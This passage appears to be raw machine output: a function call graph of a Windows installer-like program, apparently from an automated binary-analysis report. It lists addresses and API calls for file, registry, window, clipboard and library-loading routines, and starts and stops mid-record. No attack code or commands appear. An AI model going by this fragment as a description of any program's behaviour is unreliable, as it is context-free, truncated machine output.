4011->4019 4014 40646f 4014->3996 4015 40643f RegQueryValueExW RegCloseKey 4015->4014 4016->3996 4017->3996 4018->3987 4020 4063b9 4019->4020 4021 4063c2 RegOpenKeyExW 4020->4021 4022 4063bd 4020->4022 4021->4022 4022->4014 4022->4015 4024 405e3f 4023->4024 4025 405e55 4024->4025 4026 405e46 CharNextW 4024->4026 4025->4009 4026->4024 4076 40653d lstrcpynW 4027->4076 4029 405f25 4077 405eb7 CharNextW CharNextW 4029->4077 4032 405c69 4032->3948 4032->3949 4033 4067c4 5 API calls 4039 405f3b 4033->4039 4034 405f6c lstrlenW 4035 405f77 4034->4035 4034->4039 4037 405e0c 3 API calls 4035->4037 4036 406873 2 API calls 4036->4039 4038 405f7c GetFileAttributesW 4037->4038 4038->4032 4039->4032 4039->4034 4039->4036 4040 405e58 2 API calls 4039->4040 4040->4034 4041->3953 4043 405e66 4042->4043 4044 405e78 4043->4044 4045 405e6c CharPrevW 4043->4045 4044->3957 4045->4043 4045->4044 4046->3983 4083 406008 GetFileAttributesW 4047->4083 4050 405c2e 4050->3983 4051 405c24 DeleteFileW 4053 405c2a 4051->4053 4052 405c1c RemoveDirectoryW 4052->4053 4053->4050 4054 405c3a SetFileAttributesW 4053->4054 4054->4050 4056 4055ba 4055->4056 4065 40565c 4055->4065 4057 4055d6 lstrlenW 4056->4057 4058 40657a 17 API calls 4056->4058 4059 4055e4 lstrlenW 4057->4059 4060 4055ff 4057->4060 4058->4057 4061 4055f6 lstrcatW 4059->4061 4059->4065 4062 405612 4060->4062 4063 405605 SetWindowTextW 4060->4063 4061->4060 4064 405618 SendMessageW SendMessageW SendMessageW 4062->4064 4062->4065 4063->4062 4064->4065 4065->3983 4067 40631e 4066->4067 4068 406311 4066->4068 4067->3983 4086 406183 4068->4086 4071 406889 FindClose 4070->4071 4072 405dcd 4070->4072 4071->4072 4072->3950 4072->3963 4074 405dd7 4073->4074 4075 405e28 lstrcatW 4073->4075 4074->3968 4075->4074 4076->4029 4078 405ed4 4077->4078 4080 405ee6 4077->4080 4079 405ee1 CharNextW 4078->4079 4078->4080 4082 405f0a 4079->4082 4081 405e39 CharNextW 4080->4081 4080->4082 4081->4080 4082->4032 4082->4033 4084 405c0d 4083->4084 4085 40601a SetFileAttributesW 4083->4085 4084->4050 4084->4051 4084->4052 4085->4084 4087 4061b3 4086->4087 4088 4061d9 GetShortPathNameW 4086->4088 4113 40602d GetFileAttributesW CreateFileW 4087->4113 4089 4062f8 4088->4089 4090 4061ee 4088->4090 4089->4067 4090->4089 4092 4061f6 wsprintfA 4090->4092 4095 40657a 17 API calls 4092->4095 4093 4061bd CloseHandle GetShortPathNameW 4093->4089 4094 4061d1 4093->4094 4094->4088 4094->4089 4096 40621e 4095->4096 4114 40602d GetFileAttributesW CreateFileW 4096->4114 4098 40622b 4098->4089 4099 40623a GetFileSize GlobalAlloc 4098->4099 4100 4062f1 CloseHandle 4099->4100 4101 40625c 4099->4101 4100->4089 4115 4060b0 ReadFile 4101->4115 4106 40627b lstrcpyA 4109 40629d 4106->4109 4107 40628f 4108 405f92 4 API calls 4107->4108 4108->4109 4110 4062d4 SetFilePointer 4109->4110 4122 4060df WriteFile 4110->4122 4113->4093 4114->4098 4116 4060ce 4115->4116 4116->4100 4117 405f92 lstrlenA 4116->4117 4118 405fd3 lstrlenA 4117->4118 4119 405fdb 4118->4119 4120 405fac lstrcmpiA 4118->4120 4119->4106 4119->4107 4120->4119 4121 405fca CharNextA 4120->4121 4121->4118 4123 4060fd GlobalFree 4122->4123 4123->4100 4124 4015c1 4125 402da6 17 API calls 4124->4125 4126 4015c8 4125->4126 4127 405eb7 4 API calls 4126->4127 4139 4015d1 4127->4139 4128 401631 4130 401663 4128->4130 4131 401636 4128->4131 4129 405e39 CharNextW 4129->4139 4134 401423 24 API calls 4130->4134 4151 401423 4131->4151 4141 40165b 4134->4141 4138 40164a SetCurrentDirectoryW 4138->4141 4139->4128 4139->4129 4140 401617 GetFileAttributesW 4139->4140 4143 405b08 4139->4143 4146 405a6e CreateDirectoryW 4139->4146 4155 405aeb CreateDirectoryW 4139->4155 4140->4139 4158 40690a GetModuleHandleA 4143->4158 4147 405abb 4146->4147 4148 405abf GetLastError 4146->4148 4147->4139 4148->4147 4149 405ace SetFileSecurityW 4148->4149 4149->4147 4150 405ae4 GetLastError 4149->4150 4150->4147 4152 40559f 24 API calls 4151->4152 4153 401431 4152->4153 4154 40653d lstrcpynW 4153->4154 4154->4138 4156 405afb 4155->4156 4157 405aff GetLastError 4155->4157 4156->4139 4157->4156 4159 406930 GetProcAddress 4158->4159 4160 406926 4158->4160 4162 405b0f 4159->4162 4164 40689a GetSystemDirectoryW 4160->4164 4162->4139 4163 40692c 4163->4159 4163->4162 4165 4068bc wsprintfW LoadLibraryExW 4164->4165 4165->4163 4167 401c43 4189 402d84 4167->4189 4169 401c4a 4170 402d84 17 API calls 4169->4170 4171 401c57 4170->4171 4172 401c6c 4171->4172 4173 402da6 17 API calls 4171->4173 4174 401c7c 4172->4174 4175 402da6 17 API calls 4172->4175 4173->4172 4176 401cd3 4174->4176 4177 401c87 4174->4177 4175->4174 4178 402da6 17 API calls 4176->4178 4179 402d84 17 API calls 4177->4179 4180 401cd8 4178->4180 4181 401c8c 4179->4181 4182 402da6 17 API calls 4180->4182 4183 402d84 17 API calls 4181->4183 4185 401ce1 FindWindowExW 4182->4185 4184 401c98 4183->4184 4186 401cc3 SendMessageW 4184->4186 4187 401ca5 SendMessageTimeoutW 4184->4187 4188 401d03 4185->4188 4186->4188 4187->4188 4190 40657a 17 API calls 4189->4190 4191 402d99 4190->4191 4191->4169 5002 404943 5003 404953 5002->5003 5004 404979 5002->5004 5005 404499 18 API calls 5003->5005 5006 404500 8 API calls 5004->5006 5007 404960 SetDlgItemTextW 5005->5007 5008 404985 5006->5008 5007->5004 5009 4028c4 5010 4028ca 5009->5010 5011 4028d2 FindClose 5010->5011 5012 402c2a 5010->5012 5011->5012 4290 4014cb 4291 40559f 24 API calls 4290->4291 4292 4014d2 4291->4292 5013 4016cc 5014 402da6 17 API calls 5013->5014 5015 4016d2 GetFullPathNameW 5014->5015 5018 4016ec 5015->5018 5022 40170e 5015->5022 5016 401723 GetShortPathNameW 5017 402c2a 5016->5017 5019 406873 2 API calls 5018->5019 5018->5022 5020 4016fe 5019->5020 5020->5022 5023 40653d lstrcpynW 5020->5023 5022->5016 5022->5017 5023->5022 5024 401e4e GetDC 5025 402d84 17 API calls 5024->5025 5026 401e60 GetDeviceCaps MulDiv ReleaseDC 5025->5026 5027 402d84 17 API calls 5026->5027 5028 401e91 5027->5028 5029 40657a 17 API calls 5028->5029 5030 401ece CreateFontIndirectW 5029->5030 5031 402638 5030->5031 5032 4045cf lstrcpynW lstrlenW 5033 402950 5034 402da6 17 API calls 5033->5034 5036 40295c 5034->5036 5035 402972 5037 406008 2 API calls 5035->5037 5036->5035 5038 402da6 17 API calls 5036->5038 5039 402978 5037->5039 5038->5035 5061 40602d GetFileAttributesW CreateFileW 5039->5061 5041 402985 5042 402a3b 5041->5042 5043 4029a0 GlobalAlloc 5041->5043 5044 402a23 5041->5044 5045 402a42 DeleteFileW 5042->5045 5046 402a55 5042->5046 5043->5044 5047 4029b9 5043->5047 5048 4032b4 31 API calls 5044->5048 5045->5046 5062 4034e5 SetFilePointer 5047->5062 5050 402a30 CloseHandle 5048->5050 5050->5042 5051 4029bf 5052 4034cf ReadFile 5051->5052 5053 4029c8 GlobalAlloc 5052->5053 5054 4029d8 5053->5054 5055 402a0c 5053->5055 5057 4032b4 31 API calls 5054->5057 5056 4060df WriteFile 5055->5056 5058 402a18 GlobalFree 5056->5058 5060 4029e5 5057->5060 5058->5044 5059 402a03 GlobalFree 5059->5055 5060->5059 5061->5041 5062->5051 5063 732f103d 5066 732f101b 5063->5066 5073 732f15b6 5066->5073 5068 732f1020 5069 732f1027 GlobalAlloc 5068->5069 5070 732f1024 5068->5070 5069->5070 5071 732f15dd 3 API calls 5070->5071 5072 732f103b 5071->5072 5075 732f15bc 5073->5075 5074 732f15c2 5074->5068 5075->5074 5076 732f15ce GlobalFree 5075->5076 5076->5068 5077 401956 5078 402da6 17 API calls 5077->5078 5079 40195d lstrlenW 5078->5079 5080 402638 5079->5080 5081 4014d7 5082 402d84 17 API calls 5081->5082 5083 4014dd Sleep 5082->5083 5085 402c2a 5083->5085 4638 4020d8 4639 40219c 4638->4639 4640 4020ea 4638->4640 4643 401423 24 API calls 4639->4643 4641 402da6 17 API calls 4640->4641 4642 4020f1 4641->4642 4644 402da6 17 API calls 4642->4644 4648 4022f6 4643->4648 4645 4020fa 4644->4645 4646 402110 LoadLibraryExW 4645->4646 4647 402102 GetModuleHandleW 4645->4647 4646->4639 4649 402121 4646->4649 4647->4646 4647->4649 4661 406979 4649->4661 4652 402132 4654 402151 4652->4654 4655 40213a 4652->4655 4653 40216b 4656 40559f 24 API calls 4653->4656 4666 732f1817 4654->4666 4657 401423 24 API calls 4655->4657 4658 402142 4656->4658 4657->4658 4658->4648 4659 40218e FreeLibrary 4658->4659 4659->4648 4708 40655f WideCharToMultiByte 4661->4708 4663 406996 4664 40699d GetProcAddress 4663->4664 4665 40212c 4663->4665 4664->4665 4665->4652 4665->4653 4667 732f184a 4666->4667 4709 732f1bff 4667->4709 4669 732f1851 4670 732f1976 4669->4670 4671 732f1869 4669->4671 4672 732f1862 4669->4672 4670->4658 4743 732f2480 4671->4743 4759 732f243e 4672->4759 4677 732f188e 4678 732f18af 4677->4678 4679 732f18cd 4677->4679 4772 732f2655 4678->4772 4683 732f191e 4679->4683 4684 732f18d3 4679->4684 4681 732f1885 4681->4677 4753 732f2b98 4681->4753 4682 732f187f 4682->4681 4687 732f1890 4682->4687 4691 732f2655 10 API calls 4683->4691 4791 732f1666 4684->4791 4685 732f1898 4685->4677 4769 732f2e23 4685->4769 4686 732f18b5 4783 732f1654 4686->4783 4763 732f2810 4687->4763 4695 732f190f 4691->4695 4699 732f1965 4695->4699 4797 732f2618 4695->4797 4697 732f1896 4697->4677 4698 732f2655 10 API calls 4698->4695 4699->4670 4703 732f196f GlobalFree 4699->4703 4703->4670 4705 732f1951 4705->4699 4801 732f15dd wsprintfW 4705->4801 4706 732f194a FreeLibrary 4706->4705 4708->4663 4804 732f12bb GlobalAlloc 4709->4804 4711 732f1c26 4805 732f12bb GlobalAlloc 4711->4805 4713 732f1e6b GlobalFree GlobalFree GlobalFree 4714 732f1e88 4713->4714 4725 732f1ed2 4713->4725 4715 732f227e 4714->4715 4723 732f1e9d 4714->4723 4714->4725 4717 732f22a0 GetModuleHandleW 4715->4717 4715->4725 4716 732f1d26 GlobalAlloc 4735 732f1c31 4716->4735 4719 732f22c6 4717->4719 4720 732f22b1 LoadLibraryW 4717->4720 4718 732f1d8f GlobalFree 4718->4735 4812 732f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4719->4812 4720->4719 4720->4725 4721 732f1d71 lstrcpyW 4722 732f1d7b lstrcpyW 4721->4722 4722->4735 4723->4725 4808 732f12cc 4723->4808 4725->4669 4726 732f2318 4726->4725 4730 732f2325 lstrlenW 4726->4730 4727 732f2126 4811 732f12bb GlobalAlloc 4727->4811 4813 732f16bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4730->4813 4731 732f2067 GlobalFree 4731->4735 4732 732f21ae 4732->4725 4740 732f2216 lstrcpyW 4732->4740 4733 732f22d8 4733->4726 4741 732f2302 GetProcAddress 4733->4741 4735->4713 4735->4716 4735->4718 4735->4721 4735->4722 4735->4725 4735->4727 4735->4731 4735->4732 4736 732f12cc 2 API calls 4735->4736 4737 732f1dcd 4735->4737 4736->4735 4737->4735 4806 732f162f GlobalSize GlobalAlloc 4737->4806 4738 732f233f 4738->4725 4740->4725 4741->4726 4742 732f212f 4742->4669 4745 732f2498 4743->4745 4744 732f12cc GlobalAlloc lstrcpynW 4744->4745 4745->4744 4747 732f25c1 GlobalFree 4745->4747 4748 732f256b GlobalAlloc CLSIDFromString 4745->4748 4749 732f2540 GlobalAlloc WideCharToMultiByte 4745->4749 4752 732f258a 4745->4752 4815 732f135a 4745->4815 4747->4745 4750 732f186f 4747->4750 4748->4747 4749->4747 4750->4677 4750->4682 4750->4685 4752->4747 4819 732f27a4 4752->4819 4755 732f2baa 4753->4755 4754 732f2c4f VirtualAlloc 4758 732f2c6d 4754->4758 4755->4754 4757 732f2d39 4757->4677 4822 732f2b42 4758->4822 4760 732f2453 4759->4760 4761 732f245e GlobalAlloc 4760->4761 4762 732f1868 4760->4762 4761->4760 4762->4671 4767 732f2840 4763->4767 4764 732f28ee 4766 732f28f4 GlobalSize 4764->4766 4768 732f28fe 4764->4768 4765 732f28db GlobalAlloc 4765->4768 4766->4768 4767->4764 4767->4765 4768->4697 4770 732f2e2e 4769->4770 4771 732f2e6e GlobalFree 4770->4771 4826 732f12bb GlobalAlloc 4772->4826 4774 732f270b lstrcpynW 4779 732f265f 4774->4779 4775 732f26fa StringFromGUID2 4775->4779 4776 732f26d8 MultiByteToWideChar 4776->4779 4777 732f2742 GlobalFree 4777->4779 4778 732f271e wsprintfW 4778->4779 4779->4774 4779->4775 4779->4776 4779->4777 4779->4778 4780 732f2777 GlobalFree 4779->4780 4781 732f1312 2 API calls 4779->4781 4827 732f1381 4779->4827 4780->4686 4781->4779 4831 732f12bb GlobalAlloc 4783->4831 4785 732f1659 4786 732f1666 2 API calls 4785->4786 4787 732f1663 4786->4787 4788 732f1312 4787->4788 4789 732f131b GlobalAlloc lstrcpynW 4788->4789 4790 732f1355 GlobalFree 4788->4790 4789->4790 4790->4695 4792 732f169f lstrcpyW 4791->4792 4793 732f1672 wsprintfW 4791->4793 4796 732f16b8 4792->4796 4793->4796 4796->4698 4798 732f2626 4797->4798 4800 732f1931 4797->4800 4799 732f2642 GlobalFree 4798->4799 4798->4800 4799->4798 4800->4705 4800->4706 4802 732f1312 2 API calls 4801->4802 4803 732f15fe 4802->4803 4803->4699 4804->4711 4805->4735 4807 732f164d 4806->4807 4807->4737 4814 732f12bb GlobalAlloc 4808->4814 4810 732f12db lstrcpynW 4810->4725 4811->4742 4812->4733 4813->4738 4814->4810 4816 732f1361 4815->4816 4817 732f12cc 2 API calls 4816->4817 4818 732f137f 4817->4818 4818->4745 4820 732f2808 4819->4820 4821 732f27b2 VirtualAlloc 4819->4821 4820->4752 4821->4820 4823 732f2b4d 4822->4823 4824 732f2b5d 4823->4824 4825 732f2b52 GetLastError 4823->4825 4824->4757 4825->4824 4826->4779 4828 732f13ac 4827->4828 4829 732f138a 4827->4829 4828->4779 4829->4828 4830 732f1390 lstrcpyW 4829->4830 4830->4828 4831->4785 5086 404658 5088 404670 5086->5088 5089 40478a 5086->5089 5087 4047f4 5090 4048be 5087->5090 5091 4047fe GetDlgItem 5087->5091 5092 404499 18 API calls 5088->5092 5089->5087 5089->5090 5095 4047c5 GetDlgItem SendMessageW 5089->5095 5097 404500 8 API calls 5090->5097 5093 404818 5091->5093 5094 40487f 5091->5094 5096 4046d7 5092->5096 5093->5094 5099 40483e SendMessageW LoadCursorW SetCursor 5093->5099 5094->5090 5100 404891 5094->5100 5119 4044bb KiUserCallbackDispatcher 5095->5119 5102 404499 18 API calls 5096->5102 5098 4048b9 5097->5098 5123 404907 5099->5123 5104 4048a7 5100->5104 5105 404897 SendMessageW 5100->5105 5107 4046e4 CheckDlgButton 5102->5107 5104->5098 5109 4048ad SendMessageW 5104->5109 5105->5104 5106 4047ef 5120 4048e3 5106->5120 5117 4044bb KiUserCallbackDispatcher 5107->5117 5109->5098 5112 404702 GetDlgItem 5118 4044ce SendMessageW 5112->5118 5114 404718 SendMessageW 5115 404735 GetSysColor 5114->5115 5116 40473e SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5114->5116 5115->5116 5116->5098 5117->5112 5118->5114 5119->5106 5121 4048f1 5120->5121 5122 4048f6 SendMessageW 5120->5122 5121->5122 5122->5087 5126 405b63 ShellExecuteExW 5123->5126 5125 40486d LoadCursorW SetCursor 5125->5094 5126->5125 5127 402b59 5128 402b60 5127->5128 5129 402bab 5127->5129 5131 402d84 17 API calls 5128->5131 5134 402ba9 5128->5134 5130 40690a 5 API calls 5129->5130 5132 402bb2 5130->5132 5133 402b6e 5131->5133 5135 402da6 17 API calls 5132->5135 5137 402d84 17 API calls 5133->5137 5136 402bbb 5135->5136 5136->5134 5138 402bbf IIDFromString 5136->5138 5139 402b7a 5137->5139 5138->5134 5140 402bce 5138->5140 5144 406484 wsprintfW 5139->5144 5140->5134 5145 40653d lstrcpynW 5140->5145 5142 402beb CoTaskMemFree 5142->5134 5144->5134 5145->5142 4928 40175c 4929 402da6 17 API calls 4928->4929 4930 401763 4929->4930 4931 40605c 2 API calls 4930->4931 4932 40176a 4931->4932 4933 40605c 2 API calls 4932->4933 4933->4932 5146 401d5d 5147 402d84 17 API calls 5146->5147 5148 401d6e SetWindowLongW 5147->5148 5149 402c2a 5148->5149 4934 401ede 4935 402d84 17 API calls 4934->4935 4936 401ee4 4935->4936 4937 402d84 17 API calls 4936->4937 4938 401ef0 4937->4938 4939 401f07 EnableWindow 4938->4939 4940 401efc ShowWindow 4938->4940 4941 402c2a 4939->4941 4940->4941 4942 4056de 4943 405888 4942->4943 4944 4056ff GetDlgItem GetDlgItem GetDlgItem 4942->4944 4946 405891 GetDlgItem CreateThread FindCloseChangeNotification 4943->4946 4947 4058b9 4943->4947 4988 4044ce SendMessageW 4944->4988 4946->4947 4991 405672 5 API calls 4946->4991 4949 4058e4 4947->4949 4950 4058d0 ShowWindow ShowWindow 4947->4950 4951 405909 4947->4951 4948 40576f 4954 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4948->4954 4952 4058f0 4949->4952 4953 405944 4949->4953 4990 4044ce SendMessageW 4950->4990 4958 404500 8 API calls 4951->4958 4956 4058f8 4952->4956 4957 40591e ShowWindow 4952->4957 4953->4951 4961 405952 SendMessageW 4953->4961 4959 4057e4 4954->4959 4960 4057c8 SendMessageW SendMessageW 4954->4960 4962 404472 SendMessageW 4956->4962 4964 405930 4957->4964 4965 40593e 4957->4965 4963 405917 4958->4963 4968 4057f7 4959->4968 4969 4057e9 SendMessageW 4959->4969 4960->4959 4961->4963 4970 40596b CreatePopupMenu 4961->4970 4962->4951 4966 40559f 24 API calls 4964->4966 4967 404472 SendMessageW 4965->4967 4966->4965 4967->4953 4972 404499 18 API calls 4968->4972 4969->4968 4971 40657a 17 API calls 4970->4971 4973 40597b AppendMenuW 4971->4973 4974 405807 4972->4974 4975 405998 GetWindowRect 4973->4975 4976 4059ab TrackPopupMenu 4973->4976 4977 405810 ShowWindow 4974->4977 4978 405844 GetDlgItem SendMessageW 4974->4978 4975->4976 4976->4963 4980 4059c6 4976->4980 4981 405833 4977->4981 4982 405826 ShowWindow 4977->4982 4978->4963 4979 40586b SendMessageW SendMessageW 4978->4979 4979->4963 4983 4059e2 SendMessageW 4980->4983 4989 4044ce SendMessageW 4981->4989 4982->4981 4983->4983 4984 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4983->4984 4986 405a24 SendMessageW 4984->4986 4986->4986 4987 405a4d GlobalUnlock SetClipboardData CloseClipboard 4986->4987 4987->4963 4988->4948 4989->4978 4990->4949 5150 4028de 5151 4028e6 5150->5151 5152 4028ea FindNextFileW 5151->5152 5155 4028fc 5151->5155 5153 402943 5152->5153 5152->5155 5156 40653d lstrcpynW 5153->5156 5156->5155 5157 404ce0 5158 404cf0 5157->5158 5159 404d0c 5157->5159 5168 405b81 GetDlgItemTextW 5158->5168 5161 404d12 SHGetPathFromIDListW 5159->5161 5162 404d3f 5159->5162 5164 404d29 SendMessageW 5161->5164 5165 404d22 5161->5165 5163 404cfd SendMessageW 5163->5159 5164->5162 5166 40140b 2 API calls 5165->5166 5166->5164 5168->5163 5169 732f170d 5170 732f15b6 GlobalFree 5169->5170 5172 732f1725 5170->5172 5171 732f176b GlobalFree 5172->5171 5173 732f1740 5172->5173 5174 732f1757 VirtualFree 5172->5174 5173->5171 5174->5171 5175 401563 5176 402ba4 5175->5176 5179 406484 wsprintfW 5176->5179 5178 402ba9 5179->5178 5180 401968 5181 402d84 17 API calls 5180->5181 5182 40196f 5181->5182 5183 402d84 17 API calls 5182->5183 5184 40197c 5183->5184 5185 402da6 17 API calls 5184->5185 5186 401993 lstrlenW 5185->5186 5187 4019a4 5186->5187 5191 4019e5 5187->5191 5192 40653d lstrcpynW 5187->5192 5189 4019d5 5190 4019da lstrlenW 5189->5190 5189->5191 5190->5191 5192->5189 5193 40166a 5194 402da6 17 API calls 5193->5194 5195 401670 5194->5195 5196 406873 2 API calls 5195->5196 5197 401676 5196->5197 5198 402aeb 5199 402d84 17 API calls 5198->5199 5202 402af1 5199->5202 5200 40657a 17 API calls 5201 40292e 5200->5201 5202->5200 5202->5201 4293 4026ec 4294 402d84 17 API calls 4293->4294 4298 4026fb 4294->4298 4295 402745 ReadFile 4295->4298 4306 402838 4295->4306 4296 4060b0 ReadFile 4296->4298 4297 4027de 4297->4298 4297->4306 4307 40610e SetFilePointer 4297->4307 4298->4295 4298->4296 4298->4297 4299 402785 MultiByteToWideChar 4298->4299 4300 40283a 4298->4300 4303 4027ab SetFilePointer MultiByteToWideChar 4298->4303 4304 40284b 4298->4304 4298->4306 4299->4298 4316 406484 wsprintfW 4300->4316 4303->4298 4305 40286c SetFilePointer 4304->4305 4304->4306 4305->4306 4308 40612a 4307->4308 4311 406142 4307->4311 4309 4060b0 ReadFile 4308->4309 4310 406136 4309->4310 4310->4311 4312 406173 SetFilePointer 4310->4312 4313 40614b SetFilePointer 4310->4313 4311->4297 4312->4311 4313->4312 4314 406156 4313->4314 4315 4060df WriteFile 4314->4315 4315->4311 4316->4306 4575 40176f 4576 402da6 17 API calls 4575->4576 4577 401776 4576->4577 4578 401796 4577->4578 4579 40179e 4577->4579 4614 40653d lstrcpynW 4578->4614 4615 40653d lstrcpynW 4579->4615 4582 4017a9 4584 405e0c 3 API calls 4582->4584 4583 40179c 4586 4067c4 5 API calls 4583->4586 4585 4017af lstrcatW 4584->4585 4585->4583 4602 4017bb 4586->4602 4587 406873 2 API calls 4587->4602 4589 406008 2 API calls 4589->4602 4590 4017cd CompareFileTime 4590->4602 4591 40188d 4593 40559f 24 API calls 4591->4593 4592 401864 4594 40559f 24 API calls 4592->4594 4603 401879 4592->4603 4596 401897 4593->4596 4594->4603 4595 40653d lstrcpynW 4595->4602 4597 4032b4 31 API calls 4596->4597 4598 4018aa 4597->4598 4599 4018be SetFileTime 4598->4599 4601 4018d0 FindCloseChangeNotification 4598->4601 4599->4601 4600 40657a 17 API calls 4600->4602 4601->4603 4604 4018e1 4601->4604 4602->4587 4602->4589 4602->4590 4602->4591 4602->4592 4602->4595 4602->4600 4611 405b9d MessageBoxIndirectW 4602->4611 4613 40602d GetFileAttributesW CreateFileW 4602->4613 4605 4018e6 4604->4605 4606 4018f9 4604->4606 4607 40657a 17 API calls 4605->4607 4608 40657a 17 API calls 4606->4608 4609 4018ee lstrcatW 4607->4609 4610 401901 4608->4610 4609->4610 4610->4603 4612 405b9d MessageBoxIndirectW 4610->4612 4611->4602 4612->4603 4613->4602 4614->4583 4615->4582 5203 732f1000 5204 732f101b 5 API calls 5203->5204 5205 732f1019 5204->5205 5206 401a72 5207 402d84 17 API calls 5206->5207 5208 401a7b 5207->5208 5209 402d84 17 API calls 5208->5209 5210 401a20 5209->5210 5211 401573 5212 401583 ShowWindow 5211->5212 5213 40158c 5211->5213 5212->5213 5214 402c2a 5213->5214 5215 40159a ShowWindow 5213->5215 5215->5214 5216 4023f4 5217 402da6 17 API calls 5216->5217 5218 402403 5217->5218 5219 402da6 17 API calls 5218->5219 5220 40240c 5219->5220 5221 402da6 17 API calls 5220->5221 5222 402416 GetPrivateProfileStringW 5221->5222 5223 4014f5 SetForegroundWindow 5224 402c2a 5223->5224 5225 401ff6 5226 402da6 17 API calls 5225->5226 5227 401ffd 5226->5227 5228 406873 2 API calls 5227->5228 5229 402003 5228->5229 5231 402014 5229->5231 5232 406484 wsprintfW 5229->5232 5232->5231 5233 401b77 5234 402da6 17 API calls 5233->5234 5235 401b7e 5234->5235 5236 402d84 17 API calls 5235->5236 5237 401b87 wsprintfW 5236->5237 5238 402c2a 5237->5238 5239 40167b 5240 402da6 17 API calls 5239->5240 5241 401682 5240->5241 5242 402da6 17 API calls 5241->5242 5243 40168b 5242->5243 5244 402da6 17 API calls 5243->5244 5245 401694 MoveFileW 5244->5245 5246 4016a0 5245->5246 5247 4016a7 5245->5247 5249 401423 24 API calls 5246->5249 5248 406873 2 API calls 5247->5248 5251 4022f6 5247->5251 5250 4016b6 5248->5250 5249->5251 5250->5251 5252 4062fd 36 API calls 5250->5252 5252->5246 5253 4022ff 5254 402da6 17 API calls 5253->5254 5255 402305 5254->5255 5256 402da6 17 API calls 5255->5256 5257 40230e 5256->5257 5258 402da6 17 API calls 5257->5258 5259 402317 5258->5259 5260 406873 2 API calls 5259->5260 5261 402320 5260->5261 5262 402331 lstrlenW lstrlenW 5261->5262 5266 402324 5261->5266 5264 40559f 24 API calls 5262->5264 5263 40559f 24 API calls 5267 40232c 5263->5267 5265 40236f SHFileOperationW 5264->5265 5265->5266 5265->5267 5266->5263 5266->5267 5268 4019ff 5269 402da6 17 API calls 5268->5269 5270 401a06 5269->5270 5271 402da6 17 API calls 5270->5271 5272 401a0f 5271->5272 5273 401a16 lstrcmpiW 5272->5273 5274 401a28 lstrcmpW 5272->5274 5275 401a1c 5273->5275 5274->5275 5276 401000 5277 401037 BeginPaint GetClientRect 5276->5277 5278 40100c DefWindowProcW 5276->5278 5279 4010f3 5277->5279 5281 401179 5278->5281 5282 401073 CreateBrushIndirect FillRect DeleteObject 5279->5282 5283 4010fc 5279->5283 5282->5279 5284 401102 CreateFontIndirectW 5283->5284 5285 401167 EndPaint 5283->5285 5284->5285 5286 401112 6 API calls 5284->5286 5285->5281 5286->5285 5287 401d81 5288 401d94 GetDlgItem 5287->5288 5289 401d87 5287->5289 5290 401d8e 5288->5290 5291 402d84 17 API calls 5289->5291 5292 401dd5 GetClientRect LoadImageW SendMessageW 5290->5292 5293 402da6 17 API calls 5290->5293 5291->5290 5295 401e33 5292->5295 5297 401e3f 5292->5297 5293->5292 5296 401e38 DeleteObject 5295->5296 5295->5297 5296->5297 5298 401503 5299 40150b 5298->5299 5301 40151e 5298->5301 5300 402d84 17 API calls 5299->5300 5300->5301 5302 402383 5303 40239d 5302->5303 5304 40238a 5302->5304 5305 40657a 17 API calls 5304->5305 5306 402397 5305->5306 5306->5303 5307 405b9d MessageBoxIndirectW 5306->5307 5307->5303 5308 402c05 SendMessageW 5309 402c2a 5308->5309 5310 402c1f InvalidateRect 5308->5310 5310->5309 5311 732f23e9 5312 732f2453 5311->5312 5313 732f245e GlobalAlloc 5312->5313 5314 732f247d 5312->5314 5313->5312 5315 404f06 GetDlgItem GetDlgItem 5316 404f58 7 API calls 5315->5316 5324 40517d 5315->5324 5317 404ff2 SendMessageW 5316->5317 5318 404fff DeleteObject 5316->5318 5317->5318 5319 405008 5318->5319 5320 40503f 5319->5320 5325 40657a 17 API calls 5319->5325 5322 404499 18 API calls 5320->5322 5321 40525f 5323 40530b 5321->5323 5327 405170 5321->5327 5333 4052b8 SendMessageW 5321->5333 5326 405053 5322->5326 5328 405315 SendMessageW 5323->5328 5329 40531d 5323->5329 5324->5321 5349 4051ec 5324->5349 5369 404e54 SendMessageW 5324->5369 5330 405021 SendMessageW SendMessageW 5325->5330 5332 404499 18 API calls 5326->5332 5335 404500 8 API calls 5327->5335 5328->5329 5336 405336 5329->5336 5337 40532f ImageList_Destroy 5329->5337 5344 405346 5329->5344 5330->5319 5350 405064 5332->5350 5333->5327 5339 4052cd SendMessageW 5333->5339 5334 405251 SendMessageW 5334->5321 5340 40550c 5335->5340 5341 40533f GlobalFree 5336->5341 5336->5344 5337->5336 5338 4054c0 5338->5327 5345 4054d2 ShowWindow GetDlgItem ShowWindow 5338->5345 5343 4052e0 5339->5343 5341->5344 5342 40513f GetWindowLongW SetWindowLongW 5346 405158 5342->5346 5354 4052f1 SendMessageW 5343->5354 5344->5338 5359 405381 5344->5359 5374 404ed4 5344->5374 5345->5327 5347 405175 5346->5347 5348 40515d ShowWindow 5346->5348 5368 4044ce SendMessageW 5347->5368 5367 4044ce SendMessageW 5348->5367 5349->5321 5349->5334 5350->5342 5353 4050b7 SendMessageW 5350->5353 5355 40513a 5350->5355 5356 4050f5 SendMessageW 5350->5356 5357 405109 SendMessageW 5350->5357 5353->5350 5354->5323 5355->5342 5355->5346 5356->5350 5357->5350 5362 4053af SendMessageW 5359->5362 5364 4053c5 5359->5364 5360 40548b 5361 405496 InvalidateRect 5360->5361 5363 4054a2 5360->5363 5361->5363 5362->5364 5363->5338 5383 404e0f 5363->5383 5364->5360 5365 405439 SendMessageW SendMessageW 5364->5365 5365->5364 5367->5327 5368->5324 5370 404eb3 SendMessageW 5369->5370 5371 404e77 GetMessagePos ScreenToClient SendMessageW 5369->5371 5372 404eab 5370->5372 5371->5372 5373 404eb0 5371->5373 5372->5349 5373->5370 5386 40653d lstrcpynW 5374->5386 5376 404ee7 5387 406484 wsprintfW 5376->5387 5378 404ef1 5379 40140b 2 API calls 5378->5379 5380 404efa 5379->5380 5388 40653d lstrcpynW 5380->5388 5382 404f01 5382->5359 5389 404d46 5383->5389 5385 404e24 5385->5338 5386->5376 5387->5378 5388->5382 5390 404d5f 5389->5390 5391 40657a 17 API calls 5390->5391 5392 404dc3 5391->5392 5393 40657a 17 API calls 5392->5393 5394 404dce 5393->5394 5395 